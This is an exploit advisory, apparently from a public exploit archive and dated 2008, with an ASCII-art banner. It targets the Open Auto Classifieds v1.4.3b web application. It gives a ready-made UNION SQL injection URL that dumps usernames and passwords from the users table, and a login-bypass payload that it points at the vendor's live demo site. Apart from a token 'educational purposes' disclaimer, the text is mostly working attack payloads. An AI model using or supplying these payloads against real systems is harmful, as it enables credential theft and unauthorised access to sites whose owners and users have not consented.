openauto-sql.txt
Posted on 03 May 2008
|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=| | _ __ __ __ ______ | | /' __ /'__' / \__ /'__' / ___ | | /\_, ___ /\_/\_L ___ ,_/ / _ __ \__/ | | /_/ /' _ ' / /_/_\_<_ /'___ / /\''__ \___'' | | / / / L / \__/ \_ \_ / / L | | \_ \_ \_\_ \____/ \____\ \__\ \____/ \_ \____/ | | /_//_//_/ \_ /___/ /____/ /__/ /___/ /_/ /___/ | | \____/ >> Kings of injection | | /___/ | | | |-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=| Title :: Remote SQL Injection Author :: InjEctOr [s0f (at) w.cn] && Fisher762 [SQ7 (at) w.cn] Application :: Open Auto Classifieds vehicle listings manager v1.4.3b Download :: http://mesh.dl.sourceforge.net/sourceforge/openauto/openauto_v1.4.3b.zip Dork 1 :: use your mind Greets :: Allah , Muslims Hackers Terms of use :: This exploit is just for educational purposes, DO NOT use it for illegal acts. --------------------------------------------[C o n t e x t]----------------------------------------- Expl0!t:: url : http://127.0.0.1/listings.php?id=-1+union+select+1,2,3,concat(user,0x3a,pass),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+users and bypass login: http://openautoclassifieds.com/login.php << from demo site :) in Username field just type ' or 1=1 /* note: there is a lot of versions in this script and every one using Different number of columns but the name of tbl and col is same
